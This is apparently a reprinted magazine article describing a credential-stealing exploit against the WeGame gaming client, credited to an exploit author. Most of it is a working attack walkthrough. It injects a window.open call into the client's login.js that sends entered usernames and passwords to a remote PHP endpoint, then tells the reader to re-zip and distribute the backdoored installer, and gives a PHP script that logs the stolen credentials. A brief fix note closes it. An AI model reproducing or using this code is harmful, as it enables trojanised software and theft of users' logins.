WeGame Credential Stealing Exploit

WeGame, Founded in 2007, is an application for gamers. With WeGame, you can play games around the world with other players for free. WeGame is based in San Francisco based gaming company. Tagged.com, a social discovery website based in San Francisco acquired WeGame. So automatically Tagged.com becomes vulnerable to this exploit. Tagged.com allows its users to play games online using WeGame.

On 16th June, Compl3x published an exploit on 1337day.com. According to the author all the versions are affected to this exploit.

He explained it “WeGame uses a file called default.skn, found in the installation directory, to load skins for the WeGame client. This file is simply a renamed zip archive and contains images, html files and JavaScript files. These JavaScript files are not hash checked at startup, and thus, code can be injected to transmit username and password to a remote server. The code below will transmit usernames and passwords to a remote server. However, the WeGame client will execute any java script contained in these files, so there is a much wider scope to what is possible.”

This exploit can be executed in two parts. First part consists of backdooring the client.

When we look inside the default.skn file, we can see

./skin/dl-started.js

./skin/login.js

./skin/dl-confirm.js

./skin/jquery-151-min.js

We can inject our code in html file also, but here .js file is being used to process the action. The most important file for us is login.js, as all the fun will be done with this file only. Login.js executes a function called dologin() when we login in WeGame gaming server.

So let’s see how dologin() is working:

function doLogin( )

{

var pass = ”;

// doLogin( user, pass, hashed, remember_me );

// if we have a saved password hash and it wasn’t changed, send it along

if ( document.getElementById(‘real-pw’).value == edit_pw_text )

pass = hashed_pw;

else // otherwise, send whatever the user entered

pass = getValue( “password” );

wegame.doLogin( getValue( “username” ), pass, hashed, getChecked( “rememberme” ) );

}

Now to grab the alues of “username and “password” we just have to put:

creds = (getValue( “username” ) + “|” + getValue( “password” ));

This can be done using Php variables.

window.open(“http://example.com/wegame.php?user=” + getValue( “username” ) + “&pass=” + getValue( “password” ), “Logging into WeGame…”,”location=1,status=0,scrollbars=0, width=0,height=0″);

you are all set now just stick into the doLogin() function and all the credentials will be sent to you.

function doLogin( )

{

var pass = ”;

// doLogin( user, pass, hashed, remember_me );

 

// if we have a saved password hash and it wasn’t changed, send it along

if ( document.getElementById(‘real-pw’).value == edit_pw_text )

pass = hashed_pw;

else // otherwise, send whatever the user entered

pass = getValue( “password” );

window.open(“http://example.com/wegame.php?user=” + getValue( “username” ) + “&pass=” + getValue( “password” ), “Logging into WeGame…”,”location=1,status=0,scrollbars=0, width=0,height=0″);

wegame.doLogin( getValue( “username” ), pass, hashed, getChecked( “rememberme” ) );

}

Finally, re-zip the “skin” folder, stick it into the installer and distribute. Now comes the Part-2 “Setting up the Server:

After we backdoored client and installer, we will now setup the server. For this we will need a processing script (it can be in any programing language) Here we have a php script example:

<?php

//If you don’t have the username, there is no use of having the password.

if(isset($_GET['user']))

{

$user = $_GET['user'];

$pass = $_GET['pass'];

$myFile = “text.txt”;

$fh = fopen($myFile, ‘a’);

$Data = (“$user|$pass”);

fwrite($fh,$Data.”\n”);

fclose($fh);

 

echo(“<script>window.close();</script>”);

}

{

echo(“<script>window.close();</script>”);

}

?>

It is necessary that we terminate the script because if the login process doesn’t complete, the client times out with a “wrong user/pass” alert. So to exfiltrate data, we need to terminate the script window.

This script writes window.close();

This works fine as WeGame opens it as a child of the client.

How can we fix this vulnerability?

In order to fix this exploit you need to implement hash checking of vital default.skn files on startup, because if these JavaScript files are hash checked at startup the code cannot be injected to transmit username and password to a remote server, and thus this exploit will not work.

Author: Naveen Singh

Source: Originally Published in Hacker5 Magazine July Issue

Share The Post :)

Naveen Thakur

A Wandering Geek Soul.

You may also like...